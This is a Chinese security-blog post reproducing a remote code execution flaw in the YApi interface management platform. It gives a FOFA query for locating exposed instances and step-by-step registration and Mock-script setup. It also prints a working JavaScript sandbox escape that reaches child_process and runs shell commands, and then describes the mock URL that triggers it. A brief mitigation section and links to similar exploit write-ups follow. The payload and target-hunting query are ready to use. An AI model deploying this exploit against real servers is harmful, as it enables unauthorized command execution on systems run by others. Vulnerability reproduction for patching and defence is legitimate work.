【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

  • A+
所属分类:安全文章


0x01 前言

    YApi接口管理平台远程代码执行0day漏洞,攻击者可通过平台注册用户添加接口,设置mock脚本从而执行任意代码。鉴于该漏洞目前处于0day漏洞利用状态,强烈建议客户尽快采取缓解措施以避免受此漏洞影响

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

0x02 环境搭建

FOFA语法

app="YApi" 

作为一个扫地的白帽子,切勿用于非法用途

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

0x03 漏洞复现

注册一个账号

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

注册进去之后新建个项目

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

添加接口

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

选择高级Mock--->勾选脚本--->将开启按钮打开--->然后将PoC写在脚本中保存

const sandbox = thisconst ObjectConstructor = this.constructorconst FunctionConstructor = ObjectConstructor.constructorconst myfun = FunctionConstructor('return process')const process = myfun()mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

保存成功之后在预览处会看到Mock的地址

http://ip:port/mock/88/df

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

访问mock地址如下命令执行成功!

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

0x04 修复方案

关闭YAPI注册功能删除恶意账户回滚服务器快照同步删除恶意mock脚本以防止二次攻击

0x05 参考链接

https://mp.weixin.qq.com/s/H9pYITeuWbWycBRXSBxvkw

【往期推荐】

【内网渗透】内网信息收集命令汇总

【内网渗透】域内信息收集命令汇总

【超详细 | Python】CS免杀-Shellcode Loader原理(python)

【超详细 | Python】CS免杀-分离+混淆免杀思路

【超详细】CVE-2020-14882 | Weblogic未授权命令执行漏洞复现

【超详细 | 附PoC】CVE-2021-2109 | Weblogic Server远程代码执行漏洞复现

【漏洞分析 | 附EXP】CVE-2021-21985 VMware vCenter Server 远程代码执行漏洞

【CNVD-2021-30167 | 附PoC】用友NC BeanShell远程代码执行漏洞复现

【奇淫巧技】如何成为一个合格的“FOFA”工程师

记一次HW实战笔记 | 艰难的提权爬坑

【超详细】Microsoft Exchange 远程代码执行漏洞复现【CVE-2020-17144】

【超详细】Fastjson1.2.24反序列化漏洞复现

走过路过的大佬们留个关注再走呗【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

往期文章有彩蛋哦【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现


本文始发于微信公众号(渗透Xiao白帽):【超详细 | 附回显PoC】Yapi 接口管理平台RCE漏洞复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: